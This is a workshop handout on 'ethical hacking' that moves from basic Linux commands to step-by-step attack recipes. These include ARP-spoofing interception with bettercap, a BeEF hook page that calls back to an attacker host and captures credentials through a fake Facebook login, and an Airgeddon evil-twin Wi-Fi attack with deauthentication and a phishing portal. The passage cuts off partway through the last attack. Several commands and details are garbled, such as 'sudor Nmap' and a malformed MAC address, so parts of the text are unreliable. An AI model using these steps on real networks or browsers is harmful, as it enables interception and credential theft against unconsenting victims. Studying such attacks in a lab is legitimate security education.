SAVORY

MINDS
Advanced Ethical Hacking Workshop

JUNE 17

Authorized by
COE Training Platform

©SAVORY MINDS COE TRAINING PLATFORM

For the People who wants to become….
SUCCESS.

A Message from the Founder

Dear students always remember one thing. If you want to become successful!!

Give a thought to your mind!

“You got so many life experiences around you. When you read or listen about people
who are successful. Your life should never stop in reading life stories. One day your
Life should become an Inspiration to many. It’s easy to get examples. But it’s hard to
become an example. If you become an example.”

Then you are the success to the world.

Always Remember

“Every student will get a situation like this someday. You might feel yourself as a
failure, downtrodden, depressed, down and you have no one to help. Always remember
that no one can motivate you more than yourself. Try to stand up on your own, never
loose self Confidence, try until you get it.
Then definitely you will taste the success”

Finally, you stand as the definition to the success.

All the best

Wishes & Regards
Mr. B Y AMITH KUMAR
FOUNDER OF SAVORY MINDS COMPANY

©SAVORY MINDS COE TRAINING PLATFORM

 SAVORY MINDS COMPANY
Under Ministry of Communications, Home Affairs, Information Technology.

CENTER OF EXCELLENCE (COE)

TRAINING PLATFORM PRESENTS
ADVANCED ETHICAL HACKING WORKSHOP/EVENT

Reference Material-
Overview of commands

What Is Linux?

Linux is an operating system's kernel. You might have heard of UNIX. Well, Linux is a UNIX
clone. But it was actually created by Linus Torvalds from Scratch. Linux is free and open-
source, that means that you can simply change anything in Linux and redistribute it in your
own name! There are several Linux Distributions, commonly called “distros”.

• Ubuntu Linux
• Red Hat Enterprise Linux
• Linux Mint
• Debian
• Fedora

©SAVORY MINDS COE TRAINING PLATFORM

Linux is Mainly used in servers. About 90% of the internet is powered by Linux servers. This is
because Linux is fast, secure, and free! The main problem of using Windows servers is their
cost. This is solved by using Linux servers. The OS that runs in about 80% of the smartphones
in the world, Android, is also made from the Linux kernel. Most of the viruses in the world
run on Windows, but not on Linux!

Linux Shell or “Terminal”

So, basically, a shell is a program that receives commands from the user and gives it to the OS
to process, and it shows the output. Linux's shell is its main part. Its distros come in GUI
(graphical user interface), but basically, Linux has a CLI (command line interface). In this
tutorial, we are going to cover the basic commands that we use in the shell of Linux.

To open the terminal, press is in Ubuntu, or press Alt+F2, type in gnome-terminal, and press
enter. In Raspberry Pi, type in terminal. There is also a GUI way of taking it, but this is better!

Linux Commands

Basic Commands

1. pwd — When you first open the terminal, you are in the home directory of
your user. To know which directory you are in, you can use the “pwd”
command. It gives us the absolute path, which means the path that starts from
the root. The root is the base of the Linux file system. It is denoted by a forward
slash( / ). The user directory is usually something like "/home/username".

©SAVORY MINDS COE TRAINING PLATFORM

2. ls — Use the "ls" command to know what files are in the directory you are in.
You can see all the hidden files by using the command “ls -a”.

3. cd — Use the "cd" command to go to a directory. For example, if you are in

the home folder, and you want to go to the downloads folder, then you can
type in “cd Downloads”. Remember, this command is case sensitive, and you
have to type in the name of the folder exactly as it is. But there is a problem with
these commands. Imagine you have a folder named “Raspberry Pi”. In this case,
when you type in “cd Raspberry Pi”, the shell will take the second argument of
the command as a different one, so you will get an error saying that the
directory does not exist. Here, you can use a backward slash. That is, you can use
“cd Raspberry\ Pi” in this case. Spaces are denoted like this: If you just type “cd”
and press enter, it takes you to the home directory. To go back from a folder to
the folder before that, you can type “cd ..” . The two dots represent back.

4. mkdir & rmdir — Use the mkdir command when you need to create a folder
or a directory. For example, if you want to make a directory called “DIY”, then
you can type “mkdir DIY”. Remember, as told before, if you want to create a
directory named “DIY Hacking”, then you can type “mkdir DIY\ Hacking”. Use
rmdir to delete a directory. But rmdir can only be used to delete an empty
directory. To delete a directory containing files, use rm.

©SAVORY MINDS COE TRAINING PLATFORM

5. rm - Use the rm command to delete files and directories. Use "rm -r" to delete
just the directory. It deletes both the folder and the files it contains when using
only the rm command.

6. touch — The touch command is used to create a file. It can be anything, from
an empty txt file to an empty zip file. For example, “touch new.txt”.

7. man & --help — To know more about a command and how to use it, use the
man command. It shows the manual pages of the command. For example, “man
cd” shows the manual pages of the cd command. Typing in the command name
and the argument helps it show which ways the command can be used (e.g., cd –
help).

©SAVORY MINDS COE TRAINING PLATFORM

8. cp — Use the cp command to copy files through the command line. It takes
two arguments: The first is the location of the file to be copied, the second is
where to copy.

9. mv — Use the mv command to move files through the command line. We can
also use the mv command to rename a file. For example, if we want to rename
the file “text” to “new”, we can use “mv text new”. It takes the two arguments,
just like the cp command.

10. locate — The locate command is used to locate a file in a Linux system, just
like the search command in Windows. This command is useful when you don't
know where a file is saved or the actual name of the file. Using the -i argument
©SAVORY MINDS COE TRAINING PLATFORM
with the command helps to ignore the case (it doesn't matter if it is uppercase or
lowercase). So, if you want a file that has the word “hello”, it gives the list of all
the files in your Linux system containing the word "hello" when you type in
“locate -i hello”. If you remember two words, you can separate them using an
asterisk (*). For example, to locate a file containing the words "hello" and "this",
you can use the command “locate -i *hello*this”.

Intermediate Commands

1. echo — The "echo" command helps us move some data, usually text into a file.
For example, if you want to create a new text file or add to an already made
text file, you just need to type in, “echo hello, my name is alok >> new.txt”.
You do not need to separate the spaces by using the backward slash here,
because we put in two triangular brackets when we finish what we need to
write.

2. cat — Use the cat command to display the contents of a file. It is usually used
to easily view programs.

3. nano, vi, jed — nano and vi are already installed text editors in the Linux
command line. The nano command is a good text editor that denotes keywords
with color and can recognize most languages. And vi is simpler than nano. You
can create a new file or modify a file using this editor. For example, if you need
to make a new file named "check.txt", you can create it by using the command
“nano check.txt”. You can save your files after editing by using the sequence
Ctrl+X, then Y (or N for no). In my experience, using nano for HTML editing
doesn't seem as good, because of its color, so I recommend jed text editor. We
will come to installing packages soon.

©SAVORY MINDS COE TRAINING PLATFORM

4. sudo — A widely used command in the Linux command line, sudo stands for
"SuperUser Do". So, if you want any command to be done with administrative or
root privileges, you can use the sudo command. For example, if you want to
edit a file like viz. alsa-base.conf, which needs root permissions, you can use the
command – sudo nano alsa-base.conf. You can enter the root command line
using the command “sudo bash”, then type in your user password. You can also
use the command “su” to do this, but you need to set a root password before
that. For that, you can use the command “sudo passwd”(not misspelled, it is
passwd). Then type in the new root password.

5. df — Use the df command to see the available disk space in each of the
partitions in your system. You can just type in df in the command line and you
©SAVORY MINDS COE TRAINING PLATFORM
can see each mounted partition and their used/available space in % and in KBs. If
you want it shown in megabytes, you can use the command “df -m”.

6. du — Use du to know the disk usage of a file in your system. If you want to
know the disk usage for a particular folder or file in Linux, you can type in the
command df and the name of the folder or file. For example, if you want to
know the disk space used by the documents folder in Linux, you can use the
command “du Documents”. You can also use the command “ls -lah” to view the
file sizes of all the files in a folder.

7. tar — Use tar to work with tarballs (or files compressed in a tarball archive) in
the Linux command line. It has a long list of uses. It can be used to compress and
uncompress different types of tar archives like .tar, .tar.gz, .tar.bz2,etc. It works
on the basis of the arguments given to it. For example, "tar -cvf" for creating a
.tar archive, -xvf to untar a tar archive, -tvf to list the contents of the archive, etc.
Since it is a wide topic, here are some examples of tar commands.

8. zip, unzip — Use zip to compress files into a zip archive, and unzip to extract
files from a zip archive.

9. uname — Use uname to show the information about the system your Linux
distro is running. Using the command “uname -a” prints most of the information
about the system. This prints the kernel release date, version, processor type, etc.

10. apt-get — Use apt to work with packages in the Linux command line. Use
apt-get to install packages. This requires root privileges, so use the sudo
©SAVORY MINDS COE TRAINING PLATFORM
command with it. For example, if you want to install the text editor jed (as I
mentioned earlier), we can type in the command “sudo apt-get install jed”.
Similarly, any packages can be installed like this. It is good to update your
repository each time you try to install a new package. You can do that by typing
“sudo apt-get update”. You can upgrade the system by typing “sudo apt-get
upgrade”. We can also upgrade the distro by typing “sudo apt-get dist-upgrade”.
The command “apt-cache search” is used to search for a package. If you want to
search for one, you can type in “apt-cache search jed”(this doesn't require root).

11. chmod — Use chmod to make a file executable and to change the permissions
granted to it in Linux. Imagine you have a python code named numbers.py in
your computer. You'll need to run “python numbers.py” every time you need to
run it. Instead of that, when you make it executable, you'll just need to run
“numbers.py” in the terminal to run the file. To make a file executable, you can
use the command “chmod +x numbers.py” in this case. You can use “chmod 755
numbers.py” to give it root permissions or “sudo chmod +x numbers.py” for
root executable. Here is some more information about the chmod command.

12. hostname — Use hostname to know your name in your host or network.
Basically, it displays your hostname and IP address. Just typing “hostname” gives
the output. Typing in “hostname -I” gives you your IP address in your network.

©SAVORY MINDS COE TRAINING PLATFORM

13. ping — Use ping to check your connection to a server. Wikipedia says, "Ping
is a computer network administration software utility used to test the reachability
of a host on an Internet Protocol (IP) network". Simply, when you type in, for
example, “ping google.com”, it checks if it can connect to the server and come
back. It measures this round-trip time and gives you the details about it. The use
of this command for simple users like us is to check your internet connection. If it
pings the Google server (in this case), you can confirm that your internet
connection is active!

Tips and Tricks for Using Linux Command Line

©SAVORY MINDS COE TRAINING PLATFORM

 MAC ADDRESS CHANGING COMMANDS

Direct Commands (All Small Letters)

1. Sudo ifconfig eth0 down
2. Sudo ifconfig eth0 hw ether 00:11:22: 33:44
3. Sudo ifconfig eth0 up
4. Ifconfig

©SAVORY MINDS COE TRAINING PLATFORM

©SAVORY MINDS COE TRAINING PLATFORM
 NMAP

Visit https://nmap.org/

Useful Commands:
1. sudor Nmap
2. sudor Nmap -help
3. sudor Nmap -v -sn google.com
4. sudor Nmap -v -sn facebook.com

©SAVORY MINDS COE TRAINING PLATFORM

 Net Discover

It is a tool used to find the connected IP addresses, MAC addresses of a wired /

wireless network.

Command: sudo netdiscover -r <Ip address> /16 or 32

Ex: sudor netdiscover -r 192.168.1.10/16

©SAVORY MINDS COE TRAINING PLATFORM

 MITM USING BETTERCAP:

Man-in-the-middle attack (MITM) is an attack where the attacker secretly relays

and possibly alters the communications between two devices who believe that
they are directly communicating with each other. In order to perform man in the
middle attack, we need to be in the same network as our victim because we
have to fool these two devices. Now let’s initiate the attack by running our tools
which is better cap. To run better cap, we can simply open up terminal and
type better cap -face [your network interface which connected to the network].
To know which network interface is used we can simply type ifconfig and here is
what it shows us.

©SAVORY MINDS COE TRAINING PLATFORM

In my case it is wlan0, so mi just going to type better cap --iface wlan0 and press enter.

As you can see now, we already inside the tool, but it’s just a blank space without any
information. In or

Now we have some information about this tool, but our concern here is the module. For
more information we can type help followed by module’s name for example help net. Probe

©SAVORY MINDS COE TRAINING PLATFORM

So, this module consists of several parameter, but for now let just keep it default and turn on
the module by typing net. Probe on.

Now the module is already running, what actually happen is the module scanning all the
devices connected to the same network as our pc, including its Ip address, mac address and
vendor’s name. To make things clearer we can type net. Show for further information.

©SAVORY MINDS COE TRAINING PLATFORM

So, Raspberry Pi is my device used to perform this attack and my Ip address is 192.168.1.4. The
router Ip address is 192.168.1.1 knew it by Name column that is shows gateway and the rest is
client connected to this network. Now we can choose which one to be our victim, for
example

mi going to choose 192.168.1.3 which is my own laptop running windows 10. Now let’s see
the module named Arp. Spoof.

Just like previous module it’s consist of several parameter. First let’s take a look at let’s
parameter. In order to be the man in the middle we need to fool both the victim and the
router by telling the router that victim’s mac address is our mac address and telling victim that
router’s mac address is our mac address. So, we need to set this parameter to true by
typing set let’s true. Secondly, we need to set So, parameter by simply giving it Ip address of
our victim. So, in my case it will be set So, 192.168.1.3.

After setting these 2 parameters we are ready to fire up this module by typing Arp. Spoof
on. But wait a second let’s go to windows 10 and type Arp -a.

©SAVORY MINDS COE TRAINING PLATFORM

Like we already know when we type net. Show command that my router Ip’s is 192.168.1.1
and its mac is e4: **: **: **: **: e4 which is the real one. So weird thing has not happened.
Let’s go back to raspberry pi and fire up Arp. Spoof by typing Arp. Spoof on.

Now we already in the middle of our victim which is my windows 10 and my router. To make
sure let’s open up cod on windows 10 and type Arp -a, here is what it shows us.

As we can see that the mac address of our router changed to b8: **: **: **: **:08 which is my
raspberry pi mac addresses, in other word we successfully fool windows 10 by telling it that ‘I
am the router’ so that every request window 10 make will go through raspberry pi. Now we
can do packet sniffing using net. Sniff module, so let’s turn it on by typing net. Sniff on.

Press enters and then I am going to move to windows 10 and open vulnweb.com.
©SAVORY MINDS COE TRAINING PLATFORM
Nothing is weird on the browser everything is just fine. Now if we move to raspberry pi here
is what we will see.

Yeah! we know that our victim is accessing vulnweb.com as just did on my windows 10.

©SAVORY MINDS COE TRAINING PLATFORM

Direct Commands to use Bettercap tool:

1. sudo bettercap -iface eth0 or ethernet

2. sudo bettercap -iface wlan0 for wifi
3. help
4. net.probe on
5. net.recon on
6. net.show
7. set arp.spoof.fullduplex true
8. set arp.spoof.targets 192.168.1.104( Ip Addresses shown in 6th command)
9. arp.spoof on
10.net.sniff on

©SAVORY MINDS COE TRAINING PLATFORM

 Browser Exploitation Framework (BEEF)

Username and password is “beef ” for BEEF Tool

Browser Exploitation Framework (BeEF)

BeEF comes bundled with Kali Linux. I’m going to assume you have access to a
Kali Linux instance using wireless adapter.

The location of BeEF in Kali Linux is, “/usr/share/beef-xss”.

root@kali:~# cd /usr/share/beef-xss
root@kali:/usr/share/beef-xss#

We will need to configure BeEF before we are able to use it. Please open,
“/usr/share/beef-xss/config.yaml” which is a symbolic link back to “/etc/beef-
xss/config.yaml”.

root@kali:/usr/share/beef-xss# vi /etc/beef-xss/config.yaml

Please locate the “credentials” section of the configuration.

credentials:
user: "beef"
passwd: "beef"

These are the credentials we will use to access the framework GUI. BeEF won’t
start unless you change these. I recommend changing both the username and
password to something non-standard and strong.

Please locate the “http” section of the configuration.

http:
debug: false #Thin::Logging.debug, very verbose. Prints also full exception
stack trace.
host: "0.0.0.0"
port: "3000"

You need to set the host IP of your Kali Linux server where the hacked browser
will connect back to. In my case I’m going to set the host to, “192.168.1.2”.

Now run BeEF…

©SAVORY MINDS COE TRAINING PLATFORM
root@kali:/usr/share/beef-xss# ./beef
[22:07:06][*] Browser Exploitation Framework (BeEF) 0.5.0.0
[22:07:06] | Twit: @beefproject
[22:07:06] | Site: https://beefproject.com
[22:07:06] | Blog: http://blog.beefproject.com
[22:07:06] |_ Wiki: https://github.com/beefproject/beef/wiki
[22:07:06][*] Project Creator: Amith Kumar
-- migration_context()
-> 0.0032s
[22:07:06][*] BeEF is loading. Wait a few seconds...
[22:07:09][*] 8 extensions enabled:
[22:07:09] | Proxy
[22:07:09] | Demos
[22:07:09] | XSSRays
[22:07:09] | Events
[22:07:09] | Admin UI
[22:07:09] | Social Engineering
[22:07:09] | Network
[22:07:09] |_ Requester
[22:07:09][*] 303 modules enabled.
[22:07:09][*] 1 network interfaces were detected.
[22:07:09][*] running on network interface: 192.168.1.2
[22:07:09] | Hook URL: http://192.168.1.2:3000/hook.js
[22:07:09] |_ UI URL: http://192.168.1.2:3000/ui/panel
[22:07:09][*] RESTful API key: 43f6880f37e0c0b41b1e98935862bb2cf6a63266
[22:07:09][!] [GeoIP] Could not find MaxMind GeoIP database:
'/var/lib/GeoIP/GeoLite2-City.mmdb'
[22:07:09] |_ Run geoipupdate to install
[22:07:09][*] HTTP Proxy: http://127.0.0.1:6789
[22:07:09][*] BeEF server started (press control+c to stop)

The two important bits of information are:

• Hook URL: http://192.168.1.2:3000/hook.js

• UI URL: http://192.168.1.2:3000/ui/panel

The, “Hook URL” is the Javascript you need to try and get your victim to run.
You could look at something advanced like XSS but really the scary thing is any
page you browse could just include this in the script tags to allow full access to
your machine!
©SAVORY MINDS COE TRAINING PLATFORM
The, “UI URL” is the GUI for BeEF and where we’ll be able to monitor and carry
out the attack once an unsuspecting browser connects.

In order to demonstrate this I’m going to create a very basic HTML page called
“beef.html” to load the Javascript. This could be placed on a web server, put on
a file server, emailed to someone etc. If someone opens this file they will be
open for the attack. No warnings will be given, the browser won’t complain,
and the virus scanner won’t pick it up :(

<html>
<head>
<script src="http://192.168.1.2:3000/hook.js" type='text/javascript'></script>
</head>
<body>
If you are reading this you are about to be attacked!
</body>
</html>

I saved the “beef.html” on my desktop and double-clicked on it to open it.

As soon as I opened it I can see the BeEF console reported the new connection.

[22:19:31][*] New Hooked Browser [id:3, ip:192.168.1.1, browser:C-

86.0.4240.80, os:OSX-], hooked domain [Unknown:0]

Let’s open the “UI URL” and take a look.

©SAVORY MINDS COE TRAINING PLATFORM

Sign in with the credentials from, “config.yaml”.

©SAVORY MINDS COE TRAINING PLATFORM

Firstly, just clicking on the host which connected shows a stack of information
about the victim.

Please click on the, “Commands” tab.

©SAVORY MINDS COE TRAINING PLATFORM

There is a huge amount of options in each of those sections but I’m just going to
point out a few.

©SAVORY MINDS COE TRAINING PLATFORM

©SAVORY MINDS COE TRAINING PLATFORM
©SAVORY MINDS COE TRAINING PLATFORM
©SAVORY MINDS COE TRAINING PLATFORM
©SAVORY MINDS COE TRAINING PLATFORM
©SAVORY MINDS COE TRAINING PLATFORM
As you can see, many options!

I’ll demonstrate how a couple of them work.

Browser, Hooked Domain, Create Alert Dialog

©SAVORY MINDS COE TRAINING PLATFORM

I will “Execute” and send the “Alert text” of “BeEF Alert Dialog” to my victim
browser.

Social Engineering, Pretty Theft

©SAVORY MINDS COE TRAINING PLATFORM

I’m going to pop up a window that looks like Facebook login page in my victim
browser.

I’m going to add some fake credentials and see what happens.

As you can see “[email protected]” and “secretpw” was recorded!

There are literally loads of nasty options there from fake session timeouts on
many popular services, fake Flash update modals to upload exploits, accessing
webcams, taking screenshots, playing sounds, creating users, and much more.

©SAVORY MINDS COE TRAINING PLATFORM

 WIFI HACKING USING EVIL TWIN ATTACK:

Make Sure You Have Everything

To prepare our evil twin access point attack, we'll need to be using Kali Linux or
another supported distro. Quite a few distributions are supported, and you can
check out the Airgeddon GitHub page for more about which Airgeddon will
work with.

You can use a Raspberry Pi running Kali Linux for this with a wireless network
adapter, but you'll need to have access to the GUI and not be SSHed into the Pi,
since you'll need to be able to open and navigate multiple windows in this multi-
bash script.

Finally, you'll need a good wireless network adapter for this. In our tests, we
found that the TP-Link WN722N v1 and Panda Wireless PAU07 cards performed
well with these attacks. You can find more information about choosing a good
wireless network adapter at the link below.

Step 2 Install Airgeddon

To start using the Airgeddon wireless attack framework, we'll need to download
Airgeddon and any needed programs. The developer also recommends
downloading and installing a tool called CCZE to make the output easier to
understand. You can do so by typing apt-get install ccze a terminal window.

~# apt-get install ccze

Reading package lists... Done

Building dependency tree
Reading state information... Done
The following package was automatically installed and is no longer required:
libgit2-27
Use 'apt autoremove' to remove it.
The following NEW packages will be installed:
ccze
0 upgraded, 1 newly installed, 0 to remove and 1772 not upgraded.
Need to get 77.2 kB of archives.
©SAVORY MINDS COE TRAINING PLATFORM
After this operation, 324 kB of additional disk space will be used.
Get:1 http://archive.linux.duke.edu/kalilinux/kali kali-rolling/main amd64 ccze
amd64 0.2.1-4+b1 [77.2 kB]
Fetched 77.2 kB in 1s (77.4 kB/s)
Selecting previously unselected package ccze.
(Reading database ... 411785 files and directories currently installed.)
Preparing to unpack .../ccze_0.2.1-4+b1_amd64.deb ...
Unpacking ccze (0.2.1-4+b1) ...
Setting up ccze (0.2.1-4+b1) ...
Processing triggers for man-db (2.8.5-2) ...

Next, we'll install Airgeddon with git clone.

~# git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git

Cloning into 'airgeddon'...

remote: Enumerating objects: 6940, done.
remote: Total 6940 (delta 0), reused 0 (delta 0), pack-reused 6940
Receiving objects: 100% (6940/6940), 21.01 MiB | 10.31 MiB/s, done.
Resolving deltas: 100% (4369/4369), done.

Then change directories and start Airgeddon with the following commands.

~# cd airgeddon
~/airgeddon# sudo bash ./airgeddon.sh

If you see the alien spaceship, you know you're ready to hack.

************************************ Welcome
************************************

Welcome to airgeddon script v10.0

.__ .___ .___

_____ |__|______ ____ ____ __| _/__| _/____ _____
\__ \ | \_ __ \/ ___\_/ __ \ / __ |/ __ |/ _ \ / \
/ __ \| || | \/ /_/ > ___// /_/ / /_/ ( <_> ) | \
(____ /__||__| \___ / \___ >____ \____ |\____/|___| /
\/ /_____/ \/ \/ \/ \/

©SAVORY MINDS COE TRAINING PLATFORM

 Developed by v1s1t0r

* . _.---._ .
* .' '. .
_.-~=============~-._ *
. (_____________________) *
* \___________/ .
Step 3Configure Airgeddon

Press Enter to check the various tools the Airgeddon framework relies on. If
you're missing any (it'll say "Error" next to them), you can hit Y and Enter at the
prompt to try and auto-install anything missing, but that generally doesn't work.

Instead, open a new terminal window and type apt-get install tool, substituting
"tool" for the name of the missing tool. If that doesn't work, you can also try
sudo pip install tool. You should install all the tools, otherwise, you may
experience problems during your attack, especially if you are missing dnsspoof.

*********************************** Welcome
************************************
This script is only for educational purposes. Be good boyz&girlz!
Use it only on your own networks!!

Accepted bash version (5.0.3(1)-release). Minimum required version: 4.2

Root permissions successfully detected

Detecting resolution... Detected!: 1408x1024

Known compatible distros with this script:

"Arch" "Backbox" "BlackArch" "CentOS" "Cyborg" "Debian" "Fedora" "Gentoo"
"Kali" "Kali arm" "Mint" "OpenMandriva" "Parrot" "Parrot arm" "Pentoo"
"Raspbian" "Red Hat" "SuSE" "Ubuntu" "Wifislax"

Detecting system...
Kali Linux

Let's check if you have installed what script needs

Press [Enter] key to continue...

©SAVORY MINDS COE TRAINING PLATFORM

Essential tools: checking...
ifconfig .... Ok
iwconfig .... Ok
iw .... Ok
awk .... Ok
airmon-ng .... Ok
airodump-ng .... Ok
aircrack-ng .... Ok
xterm .... Ok
ip .... Ok
lspci .... Ok
ps .... Ok

Optional tools: checking...

sslstrip .... Ok
asleap .... Ok
bettercap .... Ok
packetforge-ng .... Ok
etterlog .... Ok
hashcat .... Ok
wpaclean .... Ok
john .... Ok
aireplay-ng .... Ok
bully .... Ok
ettercap .... Ok
mdk4 .... Ok
hostapd .... Ok
lighttpd .... Ok
pixiewps .... Ok
wash .... Ok
openssl .... Ok
dhcpd .... Ok
reaver .... Ok
dnsspoof .... Ok
beef-xss .... Ok
hostapd-wpe .... Ok
iptables .... Ok
crunch .... Ok

©SAVORY MINDS COE TRAINING PLATFORM

Update tools: checking...
curl .... Ok

Your distro has all necessary essential tools. Script can continue...
Press [Enter] key to continue...

When you have all of the tools, proceed to the next step by pressing Enter. Next,
the script will check for internet access so it can update itself if a newer version
exists.

The script will check for internet access looking for a newer version. Please be
patient...

The script is already in the latest version. It doesn't need to be updated

Press [Enter] key to continue...

When that is done, press Enter to select the network adapter to use. Press the
number on your keyboard that correlates to the network adapter in the list, then
Enter.

***************************** Interface selection

******************************
Select an interface to work with:
---------
1. eth0 // Chipset: Intel Corporation 82540EM
2. wlan0 // 2.4Ghz // Chipset: Atheros Communications, Inc. AR9271 802.11n
---------
*Hint* Every time you see a text with the prefix [PoT] acronym for "Pending of
Translation", means the translation has been automatically generated and is still
pending of review
---------
>

After we select our wireless network adapter, we'll proceed to the main attack
menu.

***************************** airgeddon main menu

******************************
Interface wlan0 selected. Mode: Managed. Supported bands: 2.4Ghz

©SAVORY MINDS COE TRAINING PLATFORM

Select an option from menu:
---------
0. Exit script
1. Select another network interface
2. Put interface in monitor mode
3. Put interface in managed mode
---------
4. DoS attacks menu
5. Handshake tools menu
6. Offline WPA/WPA2 decrypt menu
7. Evil Twin attacks menu
8. WPS attacks menu
9. WEP attacks menu
10. Enterprise attacks menu
---------
11. About & Credits
12. Options and language menu
---------
*Hint* If you install ccze you'll see some parts of airgeddon in a colorized way
with better aspect. It's not a requirement or a dependency, but it will improve
the user experience
---------
>

Press 2 and Enter to put your wireless card into monitor mode. Next, select
option 7 and Enter for the "Evil Twin attacks" menu, and you'll see the submenu
for this attack module appear.

**************************** Evil Twin attacks menu

****************************
Interface wlan0 selected. Mode: Managed. Supported bands: 2.4Ghz
Selected BSSID: None
Selected channel: None
Selected ESSID: None

Select an option from menu:

---------
0. Return to main menu
1. Select another network interface

©SAVORY MINDS COE TRAINING PLATFORM

2. Put interface in monitor mode
3. Put interface in managed mode
4. Explore for targets (monitor mode needed)
---------------- (without sniffing, just AP) -----------------
5. Evil Twin attack just AP
---------------------- (with sniffing) -----------------------
6. Evil Twin AP attack with sniffing
7. Evil Twin AP attack with sniffing and sslstrip
8. Evil Twin AP attack with sniffing and bettercap-sslstrip2/BeEF
------------- (without sniffing, captive portal) -------------
9. Evil Twin AP attack with captive portal (monitor mode needed)
---------
*Hint* In order to use the Evil Twin just AP and sniffing attacks, you must have
another one interface in addition to the wifi network interface will become the
AP, which will provide internet access to other clients on the network. This
doesn't need to be wifi, can be ethernet
---------
>
Step 4Select the Target

Now that we're in our attack module, select option 9 and Enter for the "Evil
Twin AP attack with a captive portal." We'll need to explore for targets, so press
Enter, and you'll see a window appear that shows a list of all detected networks.
You'll need to wait for a little to populate a list of all the nearby networks.

An exploration looking for targets is going to be done...

Press [Enter] key to continue...

**************************** Exploring for targets

****************************
Exploring for targets option chosen (monitor mode needed)
Selected interface qlan0mon is in monitor mode. Explorations can be performed
WPA/WPA2 filter enabled in scan. When started, press [Ctrl+C] to stop...
Press [Enter] key to continue...
Exploring for targets

CH 12 ][ Elapsed: 12 s ][ 2019-12-13 05:28

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
██████████████ -59 9 0 0 11 54e WPA2 CCMP PSK
██████████████
©SAVORY MINDS COE TRAINING PLATFORM
██████████████ -58 5 0 0 11 54e WPA2 CCMP PSK
██████████████
██████████████ -80 12 0 0 11 54e. WPA2 CCMP PSK
██████████████
██████████████ -79 14 0 0 6 54e. WPA2 CCMP PSK
██████████████
██████████████ -82 6 0 0 1 54e WPA2 CCMP PSK
██████████████
██████████████ -83 6 1 0 2 54e WPA2 CCMP PSK
██████████████
██████████████ -85 2 0 0 6 54e. WPA2 CCMP PSK
██████████████

BSSID STATION PWR Rate Lost Frames Probe

(not associated) 00:7E:56:97:E9:B0 -68 0 - 1 29 5
██████████████ E8:1A:1B:D9:75:0A -38 0 -24e 0 1
██████████████ 62:38:E0:34:6A:7E -58 0 - 0e 0 1
██████████████ DC:3A:5E:1D:3E:29 -57 0 -24 148 5

After it runs for about 60 seconds, exit out of the small window, and a list of
targets will appear. You'll notice that networks with someone using them appear
in yellow with an asterisk next to them. This is essential since you can't trick
someone into giving you the password if no one is on the network in the first
place.

**************************** Select target ****************************

N. BSSID CHANNEL PWR ENC ESSID

------------------------------------------------------
1)* ██████████████ 11 41% WPA2 ██████████████
2)* ██████████████ 11 20% WPA2 ██████████████
3) ██████████████ 6 15% WPA2 ██████████████
4) ██████████████ 6 19% WPA2 ██████████████
5) ██████████████ 2 17% WPA2 ██████████████
6) ██████████████ 1 18% WPA2 ██████████████
7) ██████████████ 11 42% WPA2 ██████████████

(*) Network with clients

------------------------------------------------------
Select target network:
©SAVORY MINDS COE TRAINING PLATFORM
Select the number of the target you wish to attack, and press Enter to proceed to
the next screen.

Step 5 Gather the Handshake

Now, we'll select the type of de-authentication attack we want to use to kick the
user off their trusted network. I recommend the second option, "Deauth aireplay
attack," but different attacks will work better depending on the network.

Press Enter once you've made your selection, and you'll be asked if you'd like to
enable DoS pursuit mode, which allows you to follow the AP if it moves to
another channel. You can select yes (Y) or no (N) depending on your preference,
and then press Enter. Finally, you'll select N for using an interface with internet
access. We won't need to for this attack, and it will make our attack more
portable to not need an internet source.

Handshake file selected: None

Selected internet interface: None

Select an option from menu:

---------
0. Return to Evil Twin attacks menu
---------
1. Deauth / disassoc amok mdk3 attack
2. Deauth aireplay attack
3. WIDS / WIPS / WDS Confusion attack
---------
*Hint* If you can't deauth clients from an AP using an attack, choose another
one :)
---------
2

If you want to integrate "DoS pursuit mode" on an Evil Twin attack, another
additional wifi interface in monitor mode will be needed to be able to perform it

Do you want to enable "DoS pursuit mode"? This will launch again the attack if
target AP change its channel countering "channel hopping" [y/N]
N
At this point there are two options to prepare the captive portal. Either having
an interface with internet access, or making a fake DNS using dnsspoof
©SAVORY MINDS COE TRAINING PLATFORM
Are you going to use the interface with internet access method? If the answer is
no ("n"), you'll need dnsspoof installed to continue. Both will be checked [y/N]
N

Next, it will ask you if you want to spoof your MAC address during the attack.
In this case, I chose N for "no."

Now, if we don't already have a handshake for this network, we'll have to
capture one now. Be VERY careful not to accidentally select Y for "Do you
already have a captured Handshake file?" if you do not actually have a
handshake. There is no clear way to go back to the script without restarting if
you make this mistake.

Since we don't yet have a handshake, type N for no, and press Enter to begin
capturing.

******************* Evil Twin AP attack with captive portal

*******************
Interface wlan0mon selected. Mode: Monitor. Supported bands: 2.4Ghz
Selected BSSID: ██████████████
Selected channel: 11
Selected ESSID: ██████████████
Deauthentication chosen method: Aireplay
Handshake file selected: None
---------
*Hint* Sslstrip technique is not infallible. It depends on many factors and not
always work. Some browsers such as Mozilla Firefox latest versions are not
affected
---------

Do you want to spoof your MAC address during this attack? [y/N]
N
This attack requires that you have previously a WPA/WPA2 network captured
Handshake file

If you don't have a captured Handshake file from the target network you can get
it now
---------

©SAVORY MINDS COE TRAINING PLATFORM

Do you already have a captured Handshake file? Answer yes ("y") to enter the
path or answers no ("n") to capture a new one now [y/N]
N

Once the capture process has started, a window with red text sending deauth
packets and a window with white text listening for handshakes will open. You'll
need to wait until you see "WPA Handshake:" and then the BSSID address of
your targeted network. In the example below, we're still waiting for a
handshake.

Once you see that you've got the handshake, you can exit out of the Capturing
Handshakewindow. When the script asks you if you got the handshake, select Y,
and save the handshake file. Next, select the location for you to write the stolen
password to, and you're ready to go to the final step of configuring the phishing
page.

©SAVORY MINDS COE TRAINING PLATFORM

Step 6 Set Up the Phishing Page

In the last step before launching the attack, we'll set the language of the phishing
page. The page provided by Airgeddon is pretty decent for testing out this style
of attack. In this example, we'll select 1 for English. When you've made your
selection, press Enter, and the attack will begin with six windows opening to
perform various functions of the attack simultaneously.

Selected BSSID: ██████████████

Selected channel: 11
Selected ESSID: ██████████████
Deauthentication chosen method: Aireplay
Handshake file selected: /root/handshake-██████████████.cap

Choose the language in which network clients will see the captive portal:
---------
